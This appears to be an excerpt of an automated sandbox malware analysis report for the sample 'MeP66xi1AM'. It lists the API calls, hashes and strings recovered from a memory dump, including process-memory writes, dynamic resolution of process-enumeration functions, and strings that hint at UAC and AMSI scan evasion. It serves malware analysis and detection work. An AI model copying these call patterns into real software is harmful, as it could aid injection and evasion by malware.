                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CloseOpenValue
                                        • String ID:
                                        • API String ID: 779948276-0
                                        • Opcode ID: 19cefc35a481de766d218b767752af6788f70c5ed6a9e38eab38bbc5beb6ceb6
                                        • Instruction ID: 9dc92484e8dc511e5141089114217838f28bdd79d9d746bc43169b75eada46aa
                                        • Opcode Fuzzy Hash: 19cefc35a481de766d218b767752af6788f70c5ed6a9e38eab38bbc5beb6ceb6
                                        • Instruction Fuzzy Hash: 6F113D71A50208BFEB01EFA8CC81E6A77BDEB49360F8145B0B604D7250DB74DE01DA64
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,00000000,02C85914), ref: 02B4E704
                                        • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E73C
                                        • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E747
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CloseOpenValue
                                        • String ID:
                                        • API String ID: 779948276-0
                                        • Opcode ID: f8f5bc27a2b9e69145dd937822a29463f7dc895c4947c7de0916cb8398fc6169
                                        • Instruction ID: 26c427af1f59c9e9ef7075e14b6793475c694c2723bffe30da7b834f75dd42f5
                                        • Opcode Fuzzy Hash: f8f5bc27a2b9e69145dd937822a29463f7dc895c4947c7de0916cb8398fc6169
                                        • Instruction Fuzzy Hash: F5114F71A50208BFEB01EFA8CC81E6E77BDEB49360F8145B0B604D7250DB74DA01DA64
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 473e644049c4bf136f57307527130cd8bdc8c414c7d4bf3fec19d98c2f01a562
                                        • Instruction ID: dd2b32e3b91deacf75c56de52557b833b0a839cfc73c56e5d7d217fc1f62e84a
                                        • Opcode Fuzzy Hash: 473e644049c4bf136f57307527130cd8bdc8c414c7d4bf3fec19d98c2f01a562
                                        • Instruction Fuzzy Hash: 91F0962470421097D7237B79D9C466D379AAF85710B50D4F7F486AB245CB34EC45CB63
                                        APIs
                                        • SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02B34D07
                                        • SysFreeString.OLEAUT32(00000000), ref: 02B34D19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: String$Free$Alloc
                                        • String ID:
                                        • API String ID: 986138563-0
                                        • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                        • Instruction ID: 9610242c4a335eb6121041d78c79ded7c683caa518ce7c7a9ca2ded7f7d0870e
                                        • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                        • Instruction Fuzzy Hash: D5E017B82152016EEF1B2F259C40B3B373EFFC2741B6488D9A844CA160EB78C841AE34
                                        APIs
                                        • SysFreeString.OLEAUT32(?), ref: 02B47362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FreeString
                                        • String ID: H
                                        • API String ID: 3341692771-2852464175
                                        • Opcode ID: c9ac82053f5c45dd2481ec4f59abdea3f543f4f104e3df384e3543b3af491ee9
                                        • Instruction ID: 2f6bcacb4d0b6d7c15806a0e4c9718df620473e6cbcb30991be35f8b75867b83
                                        • Opcode Fuzzy Hash: c9ac82053f5c45dd2481ec4f59abdea3f543f4f104e3df384e3543b3af491ee9
                                        • Instruction Fuzzy Hash: A2B1E274A016089FDB15CF99D8C0A9DFBF2FF4A314F2485A9E845AB360DB31A845EF50
                                        APIs
                                        • LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                        • String ID:
                                        • API String ID: 3283153180-0
                                        • Opcode ID: db515c3d4c39eb2f9378a3d8a9f493baa7ef0162c3aaca65522b113292fe6019
                                        • Instruction ID: 52fea064b65333e22c7a159866cf22cab98f56666c12b67979cd60bcd43eaeeb
                                        • Opcode Fuzzy Hash: db515c3d4c39eb2f9378a3d8a9f493baa7ef0162c3aaca65522b113292fe6019
                                        • Instruction Fuzzy Hash: C2117C71A54304BFEF02FBA8CD42A5E77BAEB45700F4149E4F208A7A51CE34AD00BB14
                                        APIs
                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B3E709
                                          • Part of subcall function 02B3E2EC: VariantClear.OLEAUT32(?), ref: 02B3E2FB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy
                                        • String ID:
                                        • API String ID: 274517740-0
                                        • Opcode ID: 137cedc2276fc5716be7b4582d6c113224e07109cb2c8c184ed65202ac8c6dcb
                                        • Instruction ID: 54618e35d5ab1df57ceeb765b5ab4283dba0878b7bf4c225ce5624549de204e2
                                        • Opcode Fuzzy Hash: 137cedc2276fc5716be7b4582d6c113224e07109cb2c8c184ed65202ac8c6dcb
                                        • Instruction Fuzzy Hash: 3E11E135710210C7CB23AF28CDC066677AAEF9575070584E7FA4A8B256DB30DC01CAA2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: InitVariant
                                        • String ID:
                                        • API String ID: 1927566239-0
                                        • Opcode ID: 5be7c9b597426923c032744daf3c0567327b35d234ad515adbf8754da933ecbb
                                        • Instruction ID: e8651121ac94b21ffebed6a47b4b159649ffa8450d67bd22e3057c53a9667292
                                        • Opcode Fuzzy Hash: 5be7c9b597426923c032744daf3c0567327b35d234ad515adbf8754da933ecbb
                                        • Instruction Fuzzy Hash: 36313E75A00209AFDB12DEA8D984AAE77E8EF0C314F4845A7F915E3250D734E951CBA2
                                        APIs
                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02B46D41,?,?,?,00000000), ref: 02B46D21
                                          • Part of subcall function 02B34C0C: SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Similarity
                                        • API ID: FreeFromProgString
                                        • String ID:
                                        • API String ID: 4225568880-0
                                        • Opcode ID: acd18929c02bcc67e01565afaa10436945fc68e659877ca6bebaf5aabea23b51
                                        • Instruction ID: 85ee39cd73decf3aa370943cf29e6307b3ff9d1900d6f92464dbf8046230465d
                                        • Opcode Fuzzy Hash: acd18929c02bcc67e01565afaa10436945fc68e659877ca6bebaf5aabea23b51
                                        • Instruction Fuzzy Hash: 68E06D31604318BBE702EBA5DC9196A7BFDEB4AB10B9144F1F801D3610DE74AE00A860
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B35832
                                          • Part of subcall function 02B35A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B30000,02B5D790), ref: 02B35A94
                                          • Part of subcall function 02B35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AB2
                                          • Part of subcall function 02B35A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AD0
                                          • Part of subcall function 02B35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B35AEE
                                          • Part of subcall function 02B35A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B35B37
                                          • Part of subcall function 02B35A78: RegQueryValueExA.ADVAPI32(?,02B35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001), ref: 02B35B55
                                          • Part of subcall function 02B35A78: RegCloseKey.ADVAPI32(?,02B35B84,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B35B77
                                        Similarity
                                        • API ID: Open$FileModuleNameQueryValue$Close
                                        • String ID:
                                        • API String ID: 2796650324-0
                                        • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                        • Instruction ID: c6a016789a99dab2843083c29c4c896d0cb4efe7a6b3c1fea43cad0ddc0c4cf9
                                        • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                        • Instruction Fuzzy Hash: 12E06DB1A002148BCB21DE5C88C0A9637D8AB08750F4005A5EC58DF34AD3B0E9548BD0
                                        APIs
                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B37DB0
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                        • Instruction ID: 78ca72745fd57447110c0cf30e85bd8b465747d9f57c7bd167956e9663217f18
                                        • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                        • Instruction Fuzzy Hash: 7DD05BB23081107AD220995A6C44EF76BDCCBC9770F100679B658C7180D7208C018671
                                        APIs
                                          • Part of subcall function 02B4A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        • Process32First.KERNEL32(?,00000128), ref: 02B4AC09
                                        Similarity
                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                        • String ID:
                                        • API String ID: 2774106396-0
                                        • Opcode ID: 43dc0492a8c691d7e41fd46b7de107dbf6efd670c84be9c42dda0044f2c10c28
                                        • Instruction ID: cd01b0d60df3ddb9aa07290089f0a0f84b91a5d358060e80c427c478f66f96a3
                                        • Opcode Fuzzy Hash: 43dc0492a8c691d7e41fd46b7de107dbf6efd670c84be9c42dda0044f2c10c28
                                        • Instruction Fuzzy Hash: F5C08CA37522201B8A1066F82EC88D38B8CCF492F630548F2F609D3103DB25CC10BAA0
                                        APIs
                                          • Part of subcall function 02B4A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        • Process32Next.KERNEL32(?,00000128), ref: 02B4AC29
                                        Similarity
                                        • API ID: AddressProc$HandleModuleNextProcess32
                                        • String ID:
                                        • API String ID: 2237597116-0
                                        • Opcode ID: 5b627e147013de1a51432109251a8edc221f90b5fec2b0af77aa713796440824
                                        • Instruction ID: ee97ae6dd4476916ebc888a8cd77c3194a6e6239baa7b15627ee9fa0c94c4356
                                        • Opcode Fuzzy Hash: 5b627e147013de1a51432109251a8edc221f90b5fec2b0af77aa713796440824
                                        • Instruction Fuzzy Hash: 2BC08CA36A22205B8F10B6F83EC88C7478CCF491F630908E2F609D3103EB298C10B2A0
                                        APIs
                                        • GetFileAttributesA.KERNEL32(00000000,?,02B52A49,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,Initialize), ref: 02B37E47
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                        • Instruction ID: 52d8adf7c807a34727923eeec0ff688d3f1880efa74ce9bd8c18cd9a33ed1eee
                                        • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                        • Instruction Fuzzy Hash: F9C08CE12022080E5E52A2FC1CC029A62CE8B042343A01FF1E538DA2CADB11D8223410
                                        APIs
                                        • GetFileAttributesA.KERNEL32(00000000,?,02B4F8CC,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,UacInitialize), ref: 02B37E23
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                        • Instruction ID: 7078496b8a28abff4e55d1eb41c046900a89a92c66334cc5366358ff89b0b339
                                        • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                        • Instruction Fuzzy Hash: 0EC08CE22022000B6A52A1FC0CC400A62CC8B042383A40FF5B538CA3D2DB2188223410
                                        APIs
                                        Similarity
                                        • API ID: FreeString
                                        • String ID:
                                        • API String ID: 3341692771-0
                                        • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                        • Instruction ID: 3c80e1a1a0bb6a368d51a9ed6781f23354f9927e2845ebefb347ab3d20fe2d2e
                                        • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                        • Instruction Fuzzy Hash: 5CC012A261022457EF225A9C9CC075572DCEB05295B5400E1D408D7240E3A49C004664
                                        APIs
                                        • timeSetEvent.WINMM(00002710,00000000,02B5BB44,00000000,00000001), ref: 02B5BB60
                                        Similarity
                                        • API ID: Eventtime
                                        • String ID:
                                        • API String ID: 2982266575-0
                                        • Opcode ID: db60576d186f4693930567eaf1c820d8a70740904b335c891c6da61c448024a7
                                        • Instruction ID: fae266530dd21c2eb76a51a9fcbd0de063ba81d96a7e797c6c9749b74cd9fe2b
                                        • Opcode Fuzzy Hash: db60576d186f4693930567eaf1c820d8a70740904b335c891c6da61c448024a7
                                        • Instruction Fuzzy Hash: D6C092F17C03003EF62166A82CC2F23768EE704B04FA004A2BA00FE2D5E5E24C600A65
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B34BEB
                                        Similarity
                                        • API ID: AllocString
                                        • String ID:
                                        • API String ID: 2525500382-0
                                        • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                        • Instruction ID: 22ee556361ed6b48dc69a54ff20c28ab94f7645aadee5e54f2d61907f598655b
                                        • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                        • Instruction Fuzzy Hash: B9B0123C28820219FE1316610D00BB230AC9B51387F8400D19E28C80C0FF00C4108832
                                        APIs
                                        • SysFreeString.OLEAUT32(00000000), ref: 02B34C03
                                        Similarity
                                        • API ID: FreeString
                                        • String ID:
                                        • API String ID: 3341692771-0
                                        • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                        • Instruction ID: fb9aa460568793f93abdc7843fcdcb50aa5d17865373798717c2fe0661450893
                                        • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                        • Instruction Fuzzy Hash: 29A022AC0003032A8F0B232C080002A303BBFE03003CAC0E800000A000CF3AC000AC30
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B31A03,?,02B32000), ref: 02B315E2
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 96b04c06739db4a606aeef37edcc228b129ef974377dbda6185474774d546495
                                        • Instruction ID: 0b36e552c75e68b3a5ae9187c777c15b48827b61334820d31e2b705aa917830d
                                        • Opcode Fuzzy Hash: 96b04c06739db4a606aeef37edcc228b129ef974377dbda6185474774d546495
                                        • Instruction Fuzzy Hash: E8F037F5B513005BEB06DF799D443017AD6E789384F1085B9E60DDB298E7719401CB00
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B32000), ref: 02B316A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 535ca2ecab823d8d141026beffba5cd25aa1f67fd39f5bc9f0abdcdf85683b20
                                        • Instruction ID: 39fab3013e57ecdf82d808f8abd114ad89d4356db08e80bc0065458a5f83962d
                                        • Opcode Fuzzy Hash: 535ca2ecab823d8d141026beffba5cd25aa1f67fd39f5bc9f0abdcdf85683b20
                                        • Instruction Fuzzy Hash: A5F0BEB2B407956BD711AF9E9C80B82BB98FB00364F054579FA4C9B340D775A8108FD4
                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B31FE4), ref: 02B31704
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 979c09ebf7041336d5a99ad494d45b8964eca934e32ddbbb135f834706100364
                                        • Instruction ID: 24e3795576ed4346dac77d216ab276d81042ee294e309f053543ff8f2049d297
                                        • Opcode Fuzzy Hash: 979c09ebf7041336d5a99ad494d45b8964eca934e32ddbbb135f834706100364
                                        • Instruction Fuzzy Hash: C2E0CDB5310301AFD7115F7D5D407127BDCEB44764F1844B5F549DB241D660E8108B60
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                        • API String ID: 667068680-597814768
                                        • Opcode ID: a005855834ffb7952f3b44e07c8b2b807393db236d93b5d3e37ba9e014b93a9e
                                        • Instruction ID: 5fa31d69515d8611eb73a9ca59437ed91a08cf30d89fc6e9643606070ad472f4
                                        • Opcode Fuzzy Hash: a005855834ffb7952f3b44e07c8b2b807393db236d93b5d3e37ba9e014b93a9e
                                        • Instruction Fuzzy Hash: F031FBB0AD0B21AFFB02EFB8D9D5A6637A9EB0678070109E5F006DF215DB74D810AF55
                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
